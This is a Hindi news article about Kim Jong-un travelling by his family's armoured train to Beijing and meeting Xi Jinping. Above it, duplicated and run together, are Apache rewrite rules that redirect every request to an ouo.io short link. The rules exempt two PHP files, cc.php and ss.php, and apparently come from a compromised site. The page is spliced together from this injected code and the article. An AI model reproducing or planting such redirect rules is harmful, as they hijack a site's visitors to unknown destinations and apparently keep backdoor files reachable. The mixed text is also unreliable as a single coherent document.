
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 398
Previous Nextनई दिल्ली। उत्तर कोरिया के तानाशाह किम जोंग-उन सत्ता संभालने के बाद पहली बार विदेशी दौरे के तहत चीन पहुंचे हैं। बाहरी दुनिया को इस बात की उस वक्त तक भनक भी नहीं थी लेकिन जैसे ही एक खास ट्रेन ने बीजिंग में दस्तक दी तो लोगों को अहसास हो गया कि इस ट्रेन में किम जोंग-उन सवार हैं। ऐसा इसलिए क्योंकि किम का परिवार ही इस हरे रंग और पीली पट्टी वाली ट्रेन में सफर करता है। यह इसलिए भी खास है क्योंकि किम खानदान हवाई यात्राओं से परहेज करता है। षडयंत्र का खतरा या हवाई उड़ान से डर इसकी वजह हो सकती है। लेकिन जब भी सत्ताधारी किम खानदान को उत्तर कोरिया से बाहर देखा गया है तो इसी खास ट्रेन से वह उन विदेशी दौरों पर गए हैं।
किम जोंग-उन के पिता किम जोंग-इल की दिसंबर 2011 में मौत के बाद उनकी यह पहली विदेशी यात्रा है। इल को हवाई यात्रा से नफरत थी। उन्होंने करीब एक दर्जन विदेशी दौरे किए। इनमें से अधिकांश दौरे चीन के थे। उस दौरान वह इसी ट्रेन से जाते थे। उन यात्राओं के दौरान ट्रेन में भव्य पार्टियां होती थीं। शराब परोसी जाती थी। इंटरटेनमेंट प्रोग्राम होते थे। उनकी यात्राएं हमेशा सीक्रेट रखी जाती थीं।
उत्तर कोरिया के संस्थापक और किम जोंग-इल के पिता तो 1984 में पूर्वी यूरोप तक इस ट्रेन से गए।
किम जोंग फिलहाल चार दिवसीय यात्रा पर चीन पहुंच गए है। किम अपनी पत्नी री सोल जू के साथ इस यात्रा पर पहुंचे और चीन के राष्ट्रपति शी जिनपिंग से मुलाकात की। रिपोर्ट्स के मुताबिक जिनपिंग से मुलाकात के बाद किम ने कहा है कि नॉर्थ कोरिया, अमेरिका से बातचीत करने के लिए तैयार है। दोनों नेताओं की मुलाकात के दौरान किम जोंग ने चीन के राष्ट्रपति शी जिनपिंग को नॉर्थ कोरिया आने का निमंत्रण भी दिया है, जिसे शी ने स्वीकार करते हुए जल्द ही आने की बात कही है।